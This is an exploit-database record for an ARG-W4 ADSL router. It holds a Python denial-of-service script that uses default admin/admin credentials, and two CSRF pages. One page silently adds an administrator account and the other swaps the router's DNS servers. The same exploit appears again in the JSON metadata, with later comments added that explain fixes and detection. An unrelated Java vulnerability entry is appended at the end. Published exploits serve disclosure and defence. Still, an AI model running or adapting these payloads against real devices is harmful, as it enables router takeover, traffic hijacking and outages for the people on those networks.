ID 1337DAY-ID-26507
Type zdt
Reporter Mojtaba MobhaM
Modified 2016-12-12T00:00:00
Description
Exploit for hardware platform in category web applications
# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
# Date: 2016-12-11
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM
# Tested on: Windows AND Linux
# Exploit Demo : http://persian-team.ir/showthread.php?tid=196
1 - Denial of Service
#!/usr/bin/python
import urllib2
import urllib
# Proof-of-concept for the "Denial of Service" item of this advisory.
# Python 2 only (raw_input, urllib2). It sends one authenticated POST to the
# router's /form2Upnp.cgi handler and does nothing else.
# The base URL is read interactively and the CGI path is appended to it.
site=raw_input("Enter Url : ")
site=site+"/form2Upnp.cgi"
# HTTP Basic credentials are hard-coded to admin/admin, so the request is only
# authenticated on a device whose admin password still has that value.
# NOTE(review): presumably the factory default; the advisory does not say.
# Defender takeaway: a changed admin password, and a management interface that
# is not reachable from the WAN side, remove this precondition.
username='admin'
password='admin'
# Register the credentials for any realm (realm=None) at this URL and install
# the resulting opener globally, so urlopen() below answers the 401 challenge.
p = urllib2.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, site, username, password)
handler = urllib2.HTTPBasicAuthHandler(p)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
# Form fields exactly as the PoC submits them: 'daemon' is a single space and
# 'ext_if' is 'pppoe+1'. The advisory does not state which field causes the
# failure or how the device fails.
# NOTE(review): looks like missing input validation in the UPnP form handler;
# confirm against the firmware. For detection, a POST to /form2Upnp.cgi with a
# blank 'daemon' value is the request to look for, if the device logs requests.
post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}
data = urllib.urlencode(post)
# Passing 'data' makes urlopen() issue a POST. Both branches print the same
# message: the bare except hides every error (timeout, reset, 401), so the
# output says nothing about whether the device accepted or survived the request.
try:
html = urllib2.urlopen(site,data)
print ("Done ! c_C")
except:
print ("Done ! c_C")
2-1 Cross-Site Request Forgery (Add Admin)
<!-- PoC page for item 2-1 (CSRF, add user). The form POSTs to
     form2userconfig.cgi on the router's LAN address 192.168.1.1 and carries
     no anti-CSRF token field. The advisory's claim is that the device acts on
     the request when it arrives from a browser already authenticated to the
     admin UI. The fields ask for a new account "mobham" with privilege
     value 2. NOTE(review): presumably the administrator level, going by the
     item title; the page does not define the value.
     Device-side fix: require a per-session token, or check Origin/Referer,
     on every state-changing CGI handler.
     Operator-side: do not keep an authenticated router session open while
     browsing other sites, and audit the user list for unexpected accounts. -->
<html>
<body>
<form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
USER:<input type="text" name="username" value="mobham" />
<input type="hidden" name="privilege" value="2" />
PWD:<input type="text" name="newpass" value="mobham" />
<!-- type="texr" is a typo in the published PoC; browsers treat an unknown
     input type as a text field, so the form still submits confpass. -->
RPWD:<input type="texr" name="confpass" value="mobham" />
<input type="hidden" name="adduser" value="Add" />
<input type="hidden" name="hiddenpass" value="" />
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2-2 Cross-Site Request Forgery (Change DNS)
<!-- PoC page for item 2-2 (CSRF, change DNS). The form POSTs to form2Dns.cgi
     on 192.168.1.1 and, like the form in item 2-1, contains no anti-CSRF token
     field. It sets dnsMode to 1 and supplies resolver addresses in dns1 and
     dns2; the values shown are the author's sample addresses.
     NOTE(review): dnsMode 1 presumably selects manually configured DNS;
     the page does not define it.
     Why it matters: a resolver chosen by a third party can answer every LAN
     client's lookups, so traffic can be redirected without touching the
     clients themselves.
     Device-side fix: per-session token or Origin/Referer check on this handler.
     Operator-side: compare the router's configured DNS servers against the
     expected ISP or internal resolvers and alert on any change. -->
<html>
<body>
<form action="http://192.168.1.1/form2Dns.cgi" method="POST">
<input type="hidden" name="dnsMode" value="1" />
DNS<input type="text" name="dns1" value="2.2.2.2" />
DNS 2<input type="text" name="dns2" value="1.1.1.1" />
DNS 3<input type="text" name="dns3" value="" />
<input type="hidden" name="submit.htm?dns.htm" value="Send" />
<input type="hidden" name="save" value="Apply Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# 0day.today [2018-03-19] #
{"sourceData": "# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities\r\n# Date: 2016-12-11\r\n# Exploit Author: Persian Hack Team\r\n# Discovered by : Mojtaba MobhaM \r\n# Tested on: Windows AND Linux\r\n# Exploit Demo : http://persian-team.ir/showthread.php?tid=196\r\n \r\n1 - Denial of Service\r\n \r\n#!/usr/bin/python\r\nimport urllib2\r\nimport urllib\r\n \r\nsite=raw_input(\"Enter Url : \")\r\nsite=site+\"/form2Upnp.cgi\"\r\nusername='admin'\r\npassword='admin'\r\np = urllib2.HTTPPasswordMgrWithDefaultRealm()\r\np.add_password(None, site, username, password)\r\nhandler = urllib2.HTTPBasicAuthHandler(p)\r\nopener = urllib2.build_opener(handler)\r\nurllib2.install_opener(opener)\r\n \r\npost = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}\r\ndata = urllib.urlencode(post)\r\ntry:\r\n html = urllib2.urlopen(site,data)\r\n print (\"Done ! c_C\")\r\nexcept:\r\n print (\"Done ! c_C\")\r\n \r\n2-1 Cross-Site Request Forgery (Add Admin)\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/form2userconfig.cgi\" method=\"POST\">\r\n USER:<input type=\"text\" name=\"username\" value=\"mobham\" />\r\n <input type=\"hidden\" name=\"privilege\" value=\"2\" />\r\n PWD:<input type=\"text\" name=\"newpass\" value=\"mobham\" />\r\n RPWD:<input type=\"texr\" name=\"confpass\" value=\"mobham\" />\r\n <input type=\"hidden\" name=\"adduser\" value=\"Add\" />\r\n <input type=\"hidden\" name=\"hiddenpass\" value=\"\" />\r\n <input type=\"hidden\" name=\"submit.htm?userconfig.htm\" value=\"Send\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n2-2 Cross-Site Request Forgery (Change DNS)\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/form2Dns.cgi\" method=\"POST\">\r\n <input type=\"hidden\" name=\"dnsMode\" value=\"1\" />\r\n DNS<input type=\"text\" name=\"dns1\" value=\"2.2.2.2\" />\r\n DNS 2<input type=\"text\" name=\"dns2\" value=\"1.1.1.1\" />\r\n DNS 3<input type=\"text\" 
name=\"dns3\" value=\"\" />\r\n <input type=\"hidden\" name=\"submit.htm?dns.htm\" value=\"Send\" />\r\n <input type=\"hidden\" name=\"save\" value=\"Apply Changes\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\n\n# 0day.today [2018-03-19] #", "history": [], "description": "Exploit for hardware platform in category web applications", "sourceHref": "https://0day.today/exploit/26507", "reporter": "Mojtaba MobhaM", "href": "https://0day.today/exploit/description/26507", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "2bebc19b72bd95e98513647d258e7828"}, {"key": "href", "hash": "b85cdc02f98d6422b14c6eb957a0663d"}, {"key": "modified", "hash": "0e7987255134b6b62c7ac9e7befc20ca"}, {"key": "published", "hash": "0e7987255134b6b62c7ac9e7befc20ca"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "22199c92ec48ba055dc0101f7e859d80"}, {"key": "sourceData", "hash": "96cd34c3f745c757726daa0e28482235"}, {"key": "sourceHref", "hash": "785020d8d8130f076a8d9990e494c93a"}, {"key": "title", "hash": "477d19cda78ad9db387b1d0715d4aa7e"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 9, "references": [], "lastseen": "2018-03-19T05:25:28", "published": "2016-12-12T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-26507", "hash": "76f77e3744568f4535e3fbc125b8da413c966126fe5d429939215617a80b48f7", "modified": "2016-12-12T00:00:00", "title": "ARG-W4 ADSL Router - Multiple Vulnerabilities", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-03-19T05:25:28"}, "dependencies": {"references": [{"type": "securityvulns", "idList": 
["SECURITYVULNS:DOC:26507"]}], "modified": "2018-03-19T05:25:28"}, "vulnersScore": 0.4}}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "description": "An attacker can add a cryptographic provider containing cipher\r\nimplementation signed by an untrusted certificate. The attacker can\r\nalso create his or her own jurisdiction policy files signed by an\r\nuntrusted certificate.\r\nIn order to achieve this, the attacker must first of all add a fake\r\ncryptographic provider (with index 1) with special\r\nCertificateFactory.X.509 implementation. Such provider is not required\r\nto be signed. This implementation can return attacker's own untrusted\r\ncertificate instead of one of the old JCE code signing certificates.\r\nThis vulnerability is caused by using CertificateFactory#getInstance\r\nwithout specifying "SUN" provider in the code which is responsible for\r\nproviders (and jurisdiction policy) signature verification.\r\nThis applies to all versions of Java HotSpot SE 5 and 6.\r\nMore details and code samples here:\r\nhttp://java.zacheusz.eu/provider-signature-verif-vuln-2/273/\r\n Regards,\r\n Zacheusz Siedlecki", "modified": "2011-06-11T00:00:00", "published": "2011-06-11T00:00:00", "id": "SECURITYVULNS:DOC:26507", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26507", "title": "Java HotSpot Cryptographic Provider signature verification vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}